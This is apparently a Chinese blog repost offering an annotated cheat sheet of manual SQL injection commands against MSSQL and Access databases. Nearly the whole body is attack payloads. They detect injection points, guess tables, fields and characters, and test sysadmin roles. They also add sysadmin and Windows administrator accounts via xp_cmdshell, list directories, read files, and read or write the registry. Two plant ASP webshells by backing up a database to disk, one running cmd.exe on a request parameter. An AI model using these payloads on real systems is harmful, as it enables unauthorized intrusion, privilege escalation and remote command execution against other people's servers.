帶註釋手動注入腳本命令整理

時間 2019-11-24

標籤註釋手動注入腳本命令整理简体版

原文原文鏈接

整理了下手動注入腳本命令[帶註釋]

1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是不是mssql ;and user>0

3.注入參數是字符’and [查詢條件] and ’’=’

4.搜索時沒過濾參數的’and [查詢條件] and ’%25’=’

5.判斷數據庫系統

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜數據庫 ;and (select Count(*) from [數據庫名])>0

7.猜字段 ;and (select Count(字段名) from 數據庫名)>0

8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數據庫名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0

10.測試權限結構（mssql）

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--

;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--

;and 1=(select IS_MEMBER(’db_owner’));--

11.添加mssql和系統的賬戶

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

12.(1)遍歷目錄

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ’c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(’上步獲得的paths’))>)

(2)遍歷目錄

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 得到當前全部驅動器

;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 得到子目錄列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 得到全部子目錄的目錄樹構

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看文件的內容

13.mssql中的存儲過程

xp_regenumvalues 註冊表根鍵, 子鍵

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多個記錄集方式返回全部鍵值

xp_regread 根鍵,子鍵,鍵值名

;exec xp_regread

’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定鍵的值

xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 寫入註冊表

xp_regdeletevalue 根鍵,子鍵,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 刪除某個值

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 刪除鍵,包括該鍵下全部值

14.mssql的backup建立webshell

use model

create table cmd(str p_w_picpath);

insert into cmd(str) values (’<% Dim oScript %>’);

backup database model to disk=’c:\l.asp’;

15.mssql內置函數

;and (select @@version)>0 得到Windows的版本號

;and user_name()=’dbo’ 判斷當前系統的鏈接用戶是否是sa

;and (select user_name())>0 爆當前系統的鏈接用戶

;and (select db_name())>0 獲得當前鏈接的數據庫

16.簡潔的webshell

use model

create table cmd(str p_w_picpath);

insert into cmd(str) values (’<%=server.createobject("wscript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>’);

backup database model to disk=’g:\wwwtest\l.asp’;

命令職場休閒 ***技術文章

0javascript

收藏css

上一篇：viking病毒查殺下一篇：感動！

cy051799

22篇文章，6W+人氣，0粉絲

Ctrl+Enter 發佈html

發佈java

取消python

猜你喜歡

個人友情連接檢查主板USB功能是否激活的方法索 python學習——python中執行shell命令思科路由交換部分命令大全。 vim全局替換命令 linux tee 命令詳解 linux 的date命令及系統時間設置 linux命令eval的用法 Storcli經常使用命令 Usermod 命令詳解 Linux基本命令總結（一） linux命令: ps、grep、kill PostgreSQL VFD機制支付結算系統如何應對高併發、熱點帳戶等問題 PostgreSQL WAL解析：構建WAL記錄準備 playbook自動安裝kafka集羣 PostgreSQL的B-tree索引 PostgreSQL pg_rewind實例--could not find previous WA redis geo 地理位置系應用戰案例 PostgreSQL如何刪除不使用的xlog文件

掃一掃,領取大禮包jquery

0linux

cy051799